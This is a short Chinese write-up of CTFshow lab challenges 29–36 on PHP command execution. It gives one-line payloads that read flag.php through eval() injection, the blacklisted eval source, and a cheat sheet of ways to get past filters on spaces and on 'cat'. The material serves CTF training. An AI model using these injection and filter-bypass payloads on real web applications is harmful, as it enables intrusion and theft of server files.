CTFSHOW web入门 29-36 命令执行
Web29
?c=system("tac f*");
Web30
?c=passthru('tac f*');
Web31
?c=passthru("tac%09fl*");
Web32
?c=include"$_POST[1]"?>
POST:
1=php://filter/read=convert.base64-encode/resource=flag.php
Web33-36
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
?c=include$_POST[1]?>
POST:
1=php://filter/read=convert.base64-encode/resource=flag.php
小结
空格绕过
< <> 重定向符
%09(需要php环境)
${IFS}
$IFS$9
{cat,flag.php} //用逗号实现了空格功能
%20
%09
cat被过滤
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容